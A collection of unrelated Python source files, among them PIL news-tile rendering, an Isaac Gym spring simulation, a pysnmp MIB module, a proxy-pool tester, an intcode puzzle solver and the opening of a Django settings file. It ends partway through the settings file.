pass help_EOF = help_exit do_EOF = do_exit def emptyline(self): pass
python
from data.scraper import DataScraper from PIL import Image,ImageFont,ImageDraw import time class GenerateTiles: def __init__(self,FONT,FONT_SIZE,FONT_COLOR,TILE_SIZE,TILE_BG_COLOR): self.FONT = FONT self.FONT_COLOR = FONT_COLOR self.FONT_SIZE = FONT_SIZE self.TILE_SIZE = TILE_SIZE self.TILE_BG_COLOR = TILE_BG_COLOR #for the logo and title self.LOGO_SIZE = (50,50) self.TITLE_FONT_SIZE = int(sum(self.TILE_SIZE) / 40) self.TITLE_FONT_COLOR = (255,255,255,255) self.LOGO_TITLE_FONT = ImageFont.truetype(font="arial.ttf",size=self.TITLE_FONT_SIZE) #last updated field self.LU_FONT_SIZE = 12 self.LU_FONT_COLOR = (255,255,255,255) self.LU_FONT = ImageFont.truetype(font="arial.ttf",size=self.LU_FONT_SIZE) #Titles self.LOCAL_NEWS_TITLE = "My Republica" self.INT_NEWS_TITLE = "New York Times" # News parser is needed to make sure that the text doesn't render out of the screen def news_parser(self,NEWS): #The "breadth" of the canvas render_limit = self.TILE_SIZE[1] #check for each article in the list. for artice_no,news_articles in enumerate(NEWS): length_of_article = len(news_articles) no_of_chars = 0 index = 0 #for each character consider a certain no of pixels are used up. So, if the text is long it takes up more pixels than the render_limit, #in which case we add a break line in the article for characters in news_articles: # The multiplication factor can be changed if needed, but 0.5 seems to work the best; the 0.5 essentially means a line break is added # after a certain no of characters have been printed no_of_chars += 0.50 * self.FONT_SIZE # this cannot be 1 because different characters seem to take up different amont of pixels to render index += 1 if no_of_chars > render_limit: news_articles = news_articles[:index] + "-\n" + news_articles[index:] no_of_chars = 0 NEWS[artice_no] = news_articles return NEWS def generate_localnews_tile(self): with Image.open("./images/local_logo.png") as logo: logo = logo.convert(mode="RGBA",colors=(0,0,0,0)) logo = logo.resize(self.LOGO_SIZE) logo = logo.copy() # A blank image where the text is rendered; canvas = Image.new("RGBA",size=self.TILE_SIZE,color=self.TILE_BG_COLOR) # Rendering the actual text drawing = ImageDraw.Draw(canvas) '''Text Rendering Settings''' '''Starting posn for drawing text; certain % times size of the canvas ''' # Changing the multiplication factor is enough to change the position __TEXT_POSN_X = 0 * self.TILE_SIZE[0] __TEXT_POSN_Y = 0.1 * self.TILE_SIZE[1] # Spacing between each line; changing the multiplication factor is enough __SPACING_BETN_LINES = int(1.4 * self.FONT_SIZE) # keeps track of the lines printed on the screen _lines = 0 # Scrapes the data required __LOCAL_NEWS = self.news_parser(DataScraper().localnews()) #draw the logo canvas.paste(im=logo,box=(0,0)) drawing.text(xy=(__TEXT_POSN_X+200,__TEXT_POSN_Y-40),text=self.LOCAL_NEWS_TITLE,font=self.LOGO_TITLE_FONT,fill=self.TITLE_FONT_COLOR) _lines+=1 #draw updated time last_updated = time.strftime("Last Updated: %x At %X %p") drawing.text(xy=(self.TILE_SIZE[0]-225,self.TILE_SIZE[1]-15),text=last_updated,font=self.LU_FONT,fill=self.LU_FONT_COLOR) for news_article in __LOCAL_NEWS: drawing.multiline_text(xy=(__TEXT_POSN_X,__TEXT_POSN_Y+(__SPACING_BETN_LINES*_lines)),text=news_article,font=self.FONT,fill=self.FONT_COLOR) _lines += 1 if "\n" in news_article: _lines += news_article.count("\n") return canvas # canvas.save("local_news.png") def generate_int_news_tile(self): with Image.open("./images/int_logo.png") as logo: logo = logo.convert(mode="RGBA",colors=(0,0,0,0)) logo = logo.resize(self.LOGO_SIZE) logo = logo.copy() # A blank image where the text is rendered; canvas = Image.new("RGBA",size=self.TILE_SIZE,color=self.TILE_BG_COLOR) # Rendering the actual text drawing = ImageDraw.Draw(canvas) '''Text Rendering Settings''' '''Starting posn for drawing text; certain % times size of the canvas ''' # Changing the multiplication factor is enough to change the position __TEXT_POSN_X = 0 * self.TILE_SIZE[0] __TEXT_POSN_Y = 0.1 * self.TILE_SIZE[1] # Spacing between each line; changing the multiplication factor is enough __SPACING_BETN_LINES = int(1.4 * self.FONT_SIZE) # keeps track of the lines printed on the screen _lines = 0 # Scrapes the data required __LOCAL_NEWS = self.news_parser(DataScraper().int_news()) #draw the logo canvas.paste(im=logo,box=(0,0)) drawing.text(xy=(__TEXT_POSN_X+200,__TEXT_POSN_Y-40),text=self.INT_NEWS_TITLE,font=self.LOGO_TITLE_FONT,fill=self.TITLE_FONT_COLOR ) _lines+=1 #draw updated time last_updated = time.strftime("Last Updated: %x At %X %p") drawing.text(xy=(self.TILE_SIZE[0]-225,self.TILE_SIZE[1]-15),text=last_updated,font=self.LU_FONT,fill=self.LU_FONT_COLOR) for news_article in __LOCAL_NEWS: drawing.multiline_text(xy=(__TEXT_POSN_X,__TEXT_POSN_Y+(__SPACING_BETN_LINES*_lines)),text=news_article,font=self.FONT,fill=self.FONT_COLOR) _lines += 1 if "\n" in news_article: _lines += news_article.count("\n") return canvas # canvas.save("int_news.png")
python
# -*- coding: utf-8 -*- """ Created on Mon Nov 2 14:56:30 2020 @author: sanja """ import numpy as np from matplotlib import pyplot as plt import cv2 import binascii img = cv2.imread('4119.png') img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY ) # Converting RGB to gray #height, width = fi # Find height and width of image #print(filename.shape) #with open(filename, 'rb') as f: # content = f.read() #print(binascii.hexlify(content)) #print(len(content)) #print(img) height, width = img.shape # Find height and width of image #img= str(img) img1 = "" #print(img1) for i in range(width): for j in range(height): if int(img[j][i]) < 10: img1 = img1 + "00" + str(int(img[j][i])) elif int(img[j][i]) < 100: img1 = img1 + "0" + str(img[j][i]) else: img1 = img1 + str(img[j][i]) #print(img1) #img_String='' #for i in range(width): # for j in range(height): # img_String= img_String + str(img1[j][i]) #img_String.replace("0x","") #print(img_String)
python
from ConexionSQL import ConexionSQL def clean_api_count(): conSql = ConexionSQL() conn = conSql.getConexion() cur = conSql.getCursor() query = """DELETE FROM tokens_count WHERE tiempo < (current_timestamp - interval \'15 minutes\');""" cur.execute(query) conn.commit() query = 'VACUUM FULL tokens_count' old_isolation_level = conn.isolation_level conn.set_isolation_level(0) query = "VACUUM FULL" cur.execute(query) conn.set_isolation_level(old_isolation_level) conn.commit() query = 'SELECT count(id) from tokens_count' cur.execute(query) print "quedan %d tokens_count"%cur.fetchone()[0] if __name__ == '__main__': clean_api_count()
python
def get_knockout_options(model_class, form): knockout_options = { 'knockout_exclude': [], 'knockout_fields': [], 'knockout_field_names': [], 'click_checked': True, } for item in (model_class, form): if not item: continue has_fields_and_exclude = ( hasattr(item, 'knockout_exclude') and hasattr(item, 'knockout_fields') ) if has_fields_and_exclude: raise Exception( 'Define knockout_exclude or knockout_fields, not both' ) for option, default in knockout_options.items(): if hasattr(item, option): value = getattr(item, option) if callable(value): knockout_options[option] = value() else: knockout_options[option] = value return knockout_options def get_knockout_field_options( field, knockout_fields, knockout_exclude, knockout_field_names ): exclude = ( (knockout_fields and field.name not in knockout_fields) or (field.name in knockout_exclude) ) if field.name in knockout_field_names: field_name = knockout_field_names[field.name] else: field_name = field.name return exclude, field_name
python
# from coursesical.course import * from course import * def test0(): t = TimeTable([("08:00", "10:10")]) s = Semester("2021-03-01", t) r = RawCourse( name="通用魔法理论基础(2)", group="(下课派:DD23333;疼逊会议)", teacher="伊蕾娜", zc="1-16(周)", classroom="王立瑟雷斯特利亚", weekday=0, time=0, text="""71010223-1 通用魔法理论基础(2) (下课派:DD23333;疼逊会议) 伊蕾娜 1-16(周) 王立瑟雷斯特利亚 """ ) c = Course(s, r) print(c.name, c.class_begin, c.class_over, c.until) print(new_course(s, r)) def test1(): t = TimeTable([("08:00", "09:40"), ("10:00", "11:40"), ("14:30", "16:10"), ("16:30", "18:10"), ("19:30", "21:10")]) s = Semester("2021-03-01", t) r = RawCourse( name="形势与政策(20212)", group="", teacher="思政", zc="12,14-16(周)", classroom="教三十楼B座709", weekday=1, time=2, text="""71420212-41 形势与政策(20212) 思政 12,14(周) 教三十楼B座709 星期六 第六大节 """ ) for c in new_course(s, r): print(c.name, c.class_begin, c.class_over, c.until) print(new_course(s, r)) if __name__ == "__main__": print('---0:') test0() print('---1:') test1()
python
from django.conf.urls import url from bluebottle.funding_flutterwave.views import FlutterwavePaymentList, FlutterwaveWebhookView, \ FlutterwaveBankAccountAccountList, FlutterwaveBankAccountAccountDetail urlpatterns = [ url(r'^/payments/$', FlutterwavePaymentList.as_view(), name='flutterwave-payment-list'), url(r'^/webhook/$', FlutterwaveWebhookView.as_view(), name='flutterwave-payment-webhook'), url(r'^/bank-accounts/$', FlutterwaveBankAccountAccountList.as_view(), name='flutterwave-external-account-list'), url(r'^/bank-accounts/(?P<pk>[\d]+)$', FlutterwaveBankAccountAccountDetail.as_view(), name='flutterwave-external-account-detail'), ]
python
""" Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. NVIDIA CORPORATION and its licensors retain all intellectual property and proprietary rights in and to this software, related documentation and any modifications thereto. Any use, reproduction, disclosure or distribution of this software and related documentation without an express license agreement from NVIDIA CORPORATION is strictly prohibited. DOF control methods example --------------------------- An example that demonstrates various DOF control methods: - Load cartpole asset from an urdf - Get/set DOF properties - Set DOF position and velocity targets - Get DOF positions - Apply DOF efforts """ import math from numpy.core.getlimits import _fr1 from isaacgym import gymapi from isaacgym import gymutil from isaacgym import gymtorch import torch import time def QUEST_Algo(): # Average of quaternions. pass # initialize gym gym = gymapi.acquire_gym() # parse arguments args = gymutil.parse_arguments(description="Joint control Methods Example") # create a simulator sim_params = gymapi.SimParams() sim_params.substeps = 2 sim_params.dt = 1.0 / 1000.0 # sim_params.flex.shape_collision_margin = 0.25 # sim_params.flex.num_outer_iterations = 4 # sim_params.flex.num_inner_iterations = 10 # sim_params.flex.solver_type = 2 # sim_params.flex.deterministic_mode = 1 sim_params.physx.solver_type = 1 sim_params.physx.num_position_iterations = 4 sim_params.physx.num_velocity_iterations = 1 sim_params.physx.num_threads = args.num_threads sim_params.physx.use_gpu = args.use_gpu sim_params.use_gpu_pipeline = False # sim_params.gravity = gymapi.Vec3(0.0, 0.0, 0.0) if args.use_gpu_pipeline: print("WARNING: Forcing CPU pipeline.") device = 'cpu' sim = gym.create_sim(args.compute_device_id, args.graphics_device_id, args.physics_engine, sim_params) # sim = gym.create_sim(args.compute_device_id, args.graphics_device_id, gymapi.SIM_FLEX, sim_params) if sim is None: print("*** Failed to create sim") quit() # create viewer using the default camera properties viewer = gym.create_viewer(sim, gymapi.CameraProperties()) if viewer is None: raise ValueError('*** Failed to create viewer') # add ground plane plane_params = gymapi.PlaneParams() plane_params.static_friction = 0.0 plane_params.dynamic_friction = 0.0 gym.add_ground(sim, gymapi.PlaneParams()) # set up the env grid num_envs = 1 spacing = 1.5 env_lower = gymapi.Vec3(-spacing, 0.0, -spacing) env_upper = gymapi.Vec3(spacing, 0.0, spacing) collision_group = 0 collision_filter = 0 # add cartpole urdf asset asset_root = "../../assets" asset_file = "urdf/RodAssembly/urdf/RodAssembly.urdf" # Load asset with default control type of position for all joints asset_options = gymapi.AssetOptions() asset_options.fix_base_link = False asset_options.angular_damping = 1 asset_options.max_angular_velocity = 100 asset_options.default_dof_drive_mode = gymapi.DOF_MODE_POS print("Loading asset '%s' from '%s'" % (asset_file, asset_root)) post_asset = gym.load_asset(sim, asset_root, asset_file, asset_options) asset_options.fix_base_link = False sling_asset = gym.load_asset(sim, asset_root, asset_file, asset_options) # initial root pose for cartpole actors initial_pose = gymapi.Transform() # Create environment 0 # Cart held steady using position target mode. # Pole held at a 45 degree angle using position target mode. env0 = gym.create_env(sim, env_lower, env_upper, 2) radius = 0.05 theta = torch.tensor(0*3.1415/180) initial_pose.p = gymapi.Vec3(radius*torch.cos(theta), 0.25, radius*torch.sin(theta)) initial_pose.r = gymapi.Quat.from_euler_zyx(-3.1415/4, 0, 0) Sling = gym.create_actor(env0, sling_asset, initial_pose, 'Sling', collision_group, collision_filter) theta = torch.tensor(120*3.1415/180) initial_pose.p = gymapi.Vec3(radius*torch.cos(theta), 0.25, radius*torch.sin(theta)) initial_pose.r = gymapi.Quat.from_euler_zyx(-3.1415/4, 3.1415*2/3, 0) LeftPost = gym.create_actor(env0, post_asset, initial_pose, 'LeftPost', collision_group, collision_filter) theta = torch.tensor(240*3.1415/180) initial_pose.p = gymapi.Vec3(radius*torch.cos(theta), 0.25, radius*torch.sin(theta)) initial_pose.r = gymapi.Quat.from_euler_zyx(-3.1415/4, 3.1415*4/3, 0) RightPost = gym.create_actor(env0, post_asset, initial_pose, 'RightPost', collision_group, collision_filter) gym.set_rigid_body_color(env0, Sling, 0, gymapi.MESH_VISUAL, gymapi.Vec3(0.97, 0.38, 0.06)) gym.set_rigid_body_color(env0, Sling, 1, gymapi.MESH_VISUAL, gymapi.Vec3(0.06, 0.97, 0.38)) gym.set_rigid_body_color(env0, Sling, 2, gymapi.MESH_VISUAL, gymapi.Vec3(0.38, 0.06, 0.97)) gym.set_rigid_body_color(env0, LeftPost, 0, gymapi.MESH_VISUAL, gymapi.Vec3(0.97, 0.38, 0.06)) gym.set_rigid_body_color(env0, LeftPost, 1, gymapi.MESH_VISUAL, gymapi.Vec3(0.06, 0.97, 0.38)) gym.set_rigid_body_color(env0, LeftPost, 2, gymapi.MESH_VISUAL, gymapi.Vec3(0.38, 0.06, 0.97)) gym.set_rigid_body_color(env0, RightPost, 0, gymapi.MESH_VISUAL, gymapi.Vec3(0.97, 0.38, 0.06)) gym.set_rigid_body_color(env0, RightPost, 1, gymapi.MESH_VISUAL, gymapi.Vec3(0.06, 0.97, 0.38)) gym.set_rigid_body_color(env0, RightPost, 2, gymapi.MESH_VISUAL, gymapi.Vec3(0.38, 0.06, 0.97)) # Look at the first env cam_pos = gymapi.Vec3(0.5, 0.5, 0) cam_target = gymapi.Vec3(0, 0, 0) gym.viewer_camera_look_at(viewer, None, cam_pos, cam_target) num_actors = gym.get_actor_count(env0) num_bodies = gym.get_env_rigid_body_count(env0) # Get state tensors rb_state_tensor = gym.acquire_rigid_body_state_tensor(sim) rb_state = gymtorch.wrap_tensor(rb_state_tensor) print(rb_state.shape) rb_pos = rb_state.view(num_bodies, 13)[:,0:3] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] rb_ori = rb_state.view(num_bodies, 13)[:,3:7] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] rb_lin_vel = rb_state.view(num_bodies, 13)[:,7:10] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] rb_ang_vel = rb_state.view(num_bodies, 13)[:,10:13] #(num_envs, num_rigid_bodies, 13)[pos,ori,Lin-vel,Ang-vel] # gym.refresh_dof_state_tensor(sim) # gym.refresh_actor_root_state_tensor(sim) gym.refresh_rigid_body_state_tensor(sim) print('rb_pos') print(rb_pos) body_names = [gym.get_asset_rigid_body_name(post_asset, i) for i in range(gym.get_asset_rigid_body_count(post_asset))] extremity_names = [s for s in body_names if "endpoint" in s] extremity_indices = [gym.find_asset_rigid_body_index(post_asset, name) for name in extremity_names] print(body_names) print(extremity_names) print(extremity_indices) # Simulate spring_coff = 50 damping_coff = 0.999 spring_length = 0.0 frame_count = 0 connection_list = [] # (1,2),(4,5),(7,8) # Connect All Bottoms connection_list.append((1, 4, 0.1)) connection_list.append((1, 7, 0.1)) connection_list.append((4, 7, 0.1)) #Connect All Tops connection_list.append((2, 5, 0.1)) connection_list.append((2, 8, 0.1)) connection_list.append((5, 8, 0.1)) #Top1 to Bottom2 connection_list.append((2, 4, 0.1)) #Body0 top is connected to Body1 bottom #Top2 to Bottom3 connection_list.append((5, 7, 0.1)) #Body0 top is connected to Body1 bottom #Top3 to Bottom1 connection_list.append((8, 1, 0.1)) #Body0 top is connected to Body1 bottom centerleftright = 1 counter = torch.tensor(0) while not gym.query_viewer_has_closed(viewer): # time.sleep(2) spring_length_multiplier = torch.cos(counter/100)*0.8 + 1 #Modifies the length from 0.2 to 1.8 the specified length counter += 1 gym.refresh_rigid_body_state_tensor(sim) forces = torch.zeros((num_envs, num_bodies, 3), device=device, dtype=torch.float) force_positions = rb_pos.clone() num_lines = len(connection_list) line_vertices = torch.zeros((num_lines*2,3), device=device, dtype=torch.float) line_colors = torch.zeros((num_lines,3), device=device, dtype=torch.float) i = 0 for connection in connection_list: # print(connection) P1 = force_positions[connection[0],:] P2 = force_positions[connection[1],:] spring_constant = spring_coff spring_length = connection[2]*spring_length_multiplier endpoint_distance = torch.norm(P1-P2) endpoint_normalized_vector = (P1-P2)/endpoint_distance spring_force = spring_constant*(endpoint_distance-spring_length) # Set springs to only work for tension and not compression spring_force = torch.max(torch.tensor(spring_force), torch.zeros_like(spring_force)) appled_force = endpoint_normalized_vector*spring_force # R2 = (P2-P1)/N # F1 = torch.max(torch.tensor(spring_constant*R1*(N-spring_length)), torch.zeros_like(N)) # F1 = torch.min(torch.tensor(spring_constant*R1*(N-spring_length)), torch.tensor(0)) print('Spring {} Tension = {}'.format(i, spring_force)) forces[0, connection[0], :] -= appled_force forces[0, connection[1], :] += appled_force test = torch.zeros((2,3), device=device, dtype=torch.float) test[0, :] = rb_lin_vel[connection[0], :] test[1, :] = rb_lin_vel[connection[1], :] # print(test.size()) R1T = torch.unsqueeze(endpoint_normalized_vector, 1) print(test.shape) print(R1T.shape) # time.sleep(5) diffthinggy = torch.tensor([[-1, 1]], device=device, dtype=torch.float) # print(diffthinggy) test2 = torch.matmul(diffthinggy, torch.matmul(test, R1T)) # print(R1*test2*damping_coff) # print(R1) forces[0, connection[0], :] += torch.squeeze(endpoint_normalized_vector*test2*damping_coff) forces[0, connection[1], :] -= torch.squeeze(endpoint_normalized_vector*test2*damping_coff) # print(test2) line_vertices[i*2,:] = force_positions[connection[0],:] line_vertices[i*2+1,:] = force_positions[connection[1],:] line_colors[i,:] = torch.tensor([1.0, 0.0, 0.0]) i += 1 # print('forces') # print(forces) # print('force_positions') # print(force_positions) # if((frame_count % 1000) == 0): # forces[0, 0, :] += torch.tensor([0.0, 0.0, 100.0]) gym.apply_rigid_body_force_at_pos_tensors(sim, gymtorch.unwrap_tensor(forces), gymtorch.unwrap_tensor(force_positions), gymapi.ENV_SPACE) # Draw Lines # print('line_verts') # print(line_vertices) gym.clear_lines(viewer) gym.add_lines(viewer, env0, num_lines, line_vertices, line_colors) frame_count += 1 # step the physics gym.simulate(sim) gym.fetch_results(sim, True) # update the viewer gym.step_graphics(sim) gym.draw_viewer(viewer, sim, True) # Wait for dt to elapse in real time. # This synchronizes the physics simulation with the rendering rate. gym.sync_frame_time(sim) print('Done') gym.destroy_viewer(viewer) gym.destroy_sim(sim)
python
from django.urls import path from .views import encuesta urlpatterns = [ path('', encuesta, name='encuesta'), ]
python
# # PySNMP MIB module REDSTONE-TC (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/REDSTONE-TC # Produced by pysmi-0.3.4 at Mon Apr 29 20:46:57 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint") rsMgmt, = mibBuilder.importSymbols("REDSTONE-SMI", "rsMgmt") ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup") Counter32, MibIdentifier, Gauge32, ObjectIdentity, TimeTicks, NotificationType, ModuleIdentity, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, IpAddress, Unsigned32, iso, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "MibIdentifier", "Gauge32", "ObjectIdentity", "TimeTicks", "NotificationType", "ModuleIdentity", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "IpAddress", "Unsigned32", "iso", "Bits") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") rsTextualConventions = ModuleIdentity((1, 3, 6, 1, 4, 1, 2773, 2, 1)) rsTextualConventions.setRevisions(('1998-01-01 00:00',)) if mibBuilder.loadTexts: rsTextualConventions.setLastUpdated('9801010000Z') if mibBuilder.loadTexts: rsTextualConventions.setOrganization('Redstone Communications, Inc.') class RsEnable(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1)) namedValues = NamedValues(("disable", 0), ("enable", 1)) class RsName(DisplayString): status = 'current' subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 15) class RsNextIfIndex(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647) class RsIpAddrLessIf(TextualConvention, IpAddress): status = 'current' class RsTimeSlotMap(TextualConvention, OctetString): status = 'current' subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(4, 4) fixedLength = 4 class RsAcctngAdminType(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1)) namedValues = NamedValues(("disabled", 0), ("enabled", 1)) class RsAcctngOperType(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2)) namedValues = NamedValues(("disable", 0), ("enable", 1), ("notSupported", 2)) mibBuilder.exportSymbols("REDSTONE-TC", RsAcctngOperType=RsAcctngOperType, rsTextualConventions=rsTextualConventions, RsAcctngAdminType=RsAcctngAdminType, RsName=RsName, PYSNMP_MODULE_ID=rsTextualConventions, RsEnable=RsEnable, RsIpAddrLessIf=RsIpAddrLessIf, RsNextIfIndex=RsNextIfIndex, RsTimeSlotMap=RsTimeSlotMap)
python
import asyncio import aiohttp import time import sys from aiohttp.client_exceptions import ClientConnectorError try: from aiohttp import ClientError except: from aiohttp import ClientProxyConnectionError as ProxyConnectionError from proxypool.db import RedisClient from proxypool.setting import * class Tester(object): def __init__(self, redis_key): self.redis = RedisClient(redis_key) async def test_single_proxy(self, proxy): """ 测试单个代理 :param proxy: :return: """ conn = aiohttp.TCPConnector(ssl=False) async with aiohttp.ClientSession(connector=conn) as session: try: if isinstance(proxy, bytes): proxy = proxy.decode('utf-8') real_proxy = 'http://' + proxy print('正在测试', proxy) headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en;q=0.9,ja;q=0.8,fr;q=0.7', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0', # 'Upgrade-Insecure-Requests': 1, 'Connection': 'close', } async with session.get(TEST_URL, headers=headers, proxy=real_proxy, timeout=TIMEOUT, allow_redirects=False) as response: if response.status in VALID_STATUS_CODES: self.redis.max(proxy) print('代理可用', proxy) else: self.redis.decrease(proxy) print('请求响应码不合法 ', response.status, 'IP', proxy) except (ClientError, ClientConnectorError, asyncio.TimeoutError, AttributeError): self.redis.decrease(proxy) print('代理请求失败', proxy) def run(self): """ 测试主函数 :return: """ print('测试器开始运行') try: count = self.redis.count() print('当前剩余', count, '个代理') for i in range(0, count, BATCH_TEST_SIZE): start = i stop = min(i + BATCH_TEST_SIZE, count) print('正在测试第', start + 1, '-', stop, '个代理') test_proxies = self.redis.batch(start, stop) loop = asyncio.get_event_loop() tasks = [self.test_single_proxy(proxy) for proxy in test_proxies] loop.run_until_complete(asyncio.wait(tasks)) sys.stdout.flush() time.sleep(5) except Exception as e: print('测试器发生错误', e.args) if __name__ == '__main__': tester = Tester() while True: print('测试器开始运行') tester.run() time.sleep(20)
python
import sys sys.path.append("..") import cv2 from CORE.streamServerDependency.camera import Camera c = Camera() cv2.namedWindow("test") while True: cv2.imshow("test", c.image) cv2.waitKey(1)
python
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import image_cropping.fields class Migration(migrations.Migration): dependencies = [ ('artwork', '0006_auto_20151010_2243'), ] operations = [ migrations.AlterField( model_name='artwork', name='thumbnail', field=image_cropping.fields.ImageRatioField('image', '640x400', hide_image_field=False, adapt_rotation=False, size_warning=True, verbose_name='thumbnail', help_text=None, allow_fullsize=False, free_crop=False), ), ]
python
import image2ascii.boot import image2ascii.lib import argparse def main(): parser = argparse.ArgumentParser() parser.add_argument('-f', '--filename', required=True, type=str) parser.add_argument('-W', '--width', type=int) parser.add_argument('-H', '--height', type=int) parser.add_argument('-greysave', action='store_true') parser.add_argument('-colorsave', action='store_true') args = parser.parse_args() image2ascii.boot.BootScreen() image2ascii.lib.Create( filename = args.filename, \ width = args.width, \ height = args.height, \ greySave = args.greysave, \ colorSave = args.colorsave ) if __name__ == '__main__': main() print()
python
import itertools from intcode import Computer def run(data): code = [int(c) for c in data.split(',')] return find_max_thrust(code)[-1], find_max_thrust_feedback(code)[-1] def find_max_thrust(code): max_thrust = 0 for phases in itertools.permutations(range(5), 5): val = 0 for phase in phases: c = Computer(code) c.run([phase, val]) val = c.output[0] if c.output[0] > max_thrust: max_thrust = c.output[0] best = phases return best, max_thrust def find_max_thrust_feedback(code): max_thrust = 0 for phases in itertools.permutations(range(5, 10), 5): amps = [Computer(code, id=i) for i in range(5)] for i, (phase, amp) in enumerate(zip(phases, amps)): amps[i-1].connect_sink(amp) amp.send_input([phase]) amps[0].send_input([0]) while any(amp.running for amp in amps): for amp in amps: amp.run() if amps[-1].output[0] > max_thrust: max_thrust = amps[-1].output[0] best = phases return best, max_thrust if __name__ == '__main__': from aocd.models import Puzzle assert find_max_thrust([3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0]) == ((4, 3, 2, 1, 0), 43210) assert (find_max_thrust([3,23,3,24,1002,24,10,24,1002,23,-1,23,101,5,23,23,1,24,23,23,4,23,99,0,0]) == ((0, 1, 2, 3, 4), 54321)) assert (find_max_thrust([3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0]) == ((1, 0, 4, 3, 2), 65210)) assert (find_max_thrust_feedback([3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5]) == ((9, 8, 7, 6, 5), 139629729)) assert (find_max_thrust_feedback([3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,55,26,1001,54, -5,54,1105,1,12,1,53,54,53,1008,54,0,55,1001,55,1,55,2,53,55,53,4, 53,1001,56,-1,56,1005,56,6,99,0,0,0,0,10]) == ((9, 7, 8, 5, 6), 18216)) puz = Puzzle(2019, 7) part_a, part_b = run(puz.input_data) puz.answer_a = part_a print(f'Part 1: {puz.answer_a}') puz.answer_b = part_b print(f'Part 2: {puz.answer_b}')
python
''' Development Test Module ''' # import os import argparse from dotenv import load_dotenv #from pyspreader.client import SpreadClient, MSSQLSpreadClient from pyspreader.worker import SpreadWorker load_dotenv(verbose=True) if __name__ == '__main__': # cli = MSSQLSpreadClient(connection_string=os.environ.get('SPREADER_LIVE_DSN'), debug=True) # cli.agent_name = 'Test Agent' # agentid = cli.connect() # print('Current Agent ID is', agentid) parser = argparse.ArgumentParser(prefix_chars='/') parser.add_argument('/id', required=True) xargs = parser.parse_args() print('*******************************') worker = SpreadWorker(debug=True, id=xargs.id) print('SpreadWorker: ', worker) print('Starting...') worker.start() print('Waiting for Client to close process...') worker.wait_for_worker_close() print('Finished')
python
""" Django settings for ac_mediator project. Generated by 'django-admin startproject' using Django 1.10.2. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os import dj_database_url import raven # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv('DJANGO_SECRET_KEY', 'default_secret_key') # Debug, allowed hosts and database if os.getenv('DEPLOY_ENV', 'dev') == 'prod': if SECRET_KEY == 'default_secret_key': print("Please configure your secret key by setting DJANGO_SECRET_KEY environment variable") DEBUG = False ALLOWED_HOSTS = ['localhost', 'asplab-web1', 'm.audiocommons.org', 'asplab-web1.s.upf.edu', 'docker.sb.upf.edu'] else: DEBUG = True DATABASE_URL_ENV_NAME = 'DJANGO_DATABASE_URL' DATABASES = {'default': dj_database_url.config( DATABASE_URL_ENV_NAME, default='postgres://postgres:postgres@db/ac_mediator')} # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django_extensions', 'accounts', 'api', 'rest_framework', 'oauth2_provider', 'developers', 'services', 'docs', 'raven.contrib.django.raven_compat', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'ac_mediator.urls' TEMPLATES = [ { 